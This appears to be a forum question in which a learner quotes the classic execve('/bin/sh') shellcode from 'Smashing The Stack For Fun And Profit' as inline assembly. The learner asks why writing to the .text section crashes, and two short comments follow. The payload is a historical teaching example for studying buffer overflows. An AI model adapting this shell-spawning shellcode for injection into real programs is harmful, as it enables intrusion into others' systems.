
I learned about exploits through the article "Smashing The Stack For Fun And Profit", and I have some questions about this example:

void main() {
__asm__("
    jmp    0x2a                     # 3 bytes
    popl   %esi                     # 1 byte
    movl   %esi,0x8(%esi)           # 3 bytes
    movb   $0x0,0x7(%esi)           # 4 bytes
    movl   $0x0,0xc(%esi)           # 7 bytes
    movl   $0xb,%eax                # 5 bytes
    movl   %esi,%ebx                # 2 bytes
    leal   0x8(%esi),%ecx           # 3 bytes
    leal   0xc(%esi),%edx           # 3 bytes
    int    $0x80                    # 2 bytes
    movl   $0x1, %eax               # 5 bytes
    movl   $0x0, %ebx               # 5 bytes
    int    $0x80                    # 2 bytes
    call   -0x2f                    # 5 bytes
    .string \"/bin/sh\"             # 8 bytes
");
}

After call -0x2f, register %esi has the address of the address of the string "/bin/sh"; this is also an address in section .text. My implementation always crashes at this line of code:

movl %esi,0x8(%esi) # 3 bytes

How can I access and use an address that belongs to section .text, as in the example above?

For anyone here to help you understand/fix that uncommented assembler code, they'd need to read that entire article on your behalf... –  Oli Charlesworth 22 hours ago
 
I don't know... Article from phrack.org (= phrack.com)... I wonder what kind of stuff the OP is after... –  turboscrew 16 hours ago